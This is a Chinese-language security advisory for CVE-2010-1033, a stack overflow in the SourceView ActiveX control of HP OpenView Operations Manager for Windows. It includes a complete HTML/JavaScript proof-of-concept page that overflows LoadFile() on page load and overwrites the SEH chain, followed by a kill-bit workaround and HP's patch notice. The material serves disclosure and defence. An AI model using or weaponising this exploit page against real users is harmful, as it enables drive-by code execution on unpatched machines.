发布日期：2010-04-19
更新日期：2010-04-21

受影响系统：

HP Openview Operations for Windows 8.16
HP Openview Operations for Windows 8.10
HP Openview Operations for Windows 7.5

描述：

---

BUGTRAQ  ID: 39578
CVE(CAN) ID: CVE-2010-1033

HP Operations Manager是用于协调IT基础架构中网络、最终用户体验事件的综合事件和性能管理控制台。

HP Operations Manager所安装的SourceView ActiveX控件（srcvw32.dll或srcvw4.dll）中存在栈溢出漏洞。如果用户受骗访问了恶意网页并向LoadFile()方式传送了超长字符串参数的话，就可以触发这个溢出，导致执行任意代码。

<*来源：mr_me
  
  链接：http://secunia.com/advisories/39538/
        http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-027-hp-operations-manager-remote-bof/
        http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800&printver=true
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<object classid='clsid:366C9C52-C402-416B-862D-1464F629CA59' id='boom' ></object>
<script language="JavaScript" defer>
  function b00m()  
   {  
    var buffSize = 1072;
    var x = unescape("%41");
    var y = unescape("%44");
    // 'B' or \x41 as the 2nd byte of nseh will destroy our SEH chain
    var nseh = unescape("%43%43");
    var seh = unescape("%42%42");
    while (x.length<buffSize) x += x;  
    x = x.substring(0,buffSize);
    while (y.length<buffSize) y += y;  
    y = y.substring(0,buffSize);    
    boom.LoadFile(x+nseh+seh+y);
  }  
</script>  
<body onload="JavaScript: return b00m();">    
<p><center>~ mr_me presents ~</p>
<p><b>HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile() Remote Unicode Stack Overflow PoC</b></center></p>
</body>
</html>

建议：

---

临时解决方法：

* 为clsid 366C9C52-C402-416B-862D-1464F629CA59设置kill bit。

厂商补丁：

HP
--
HP已经为此发布了一个安全公告（HPSBMA02491）以及相应补丁:
HPSBMA02491：SSRT100060 rev.1 - HP Operations Manager for Windows, Remote Execution of Arbitrary Code
链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800&printver=true

浏览次数：2293
严重程度：0（网友投票）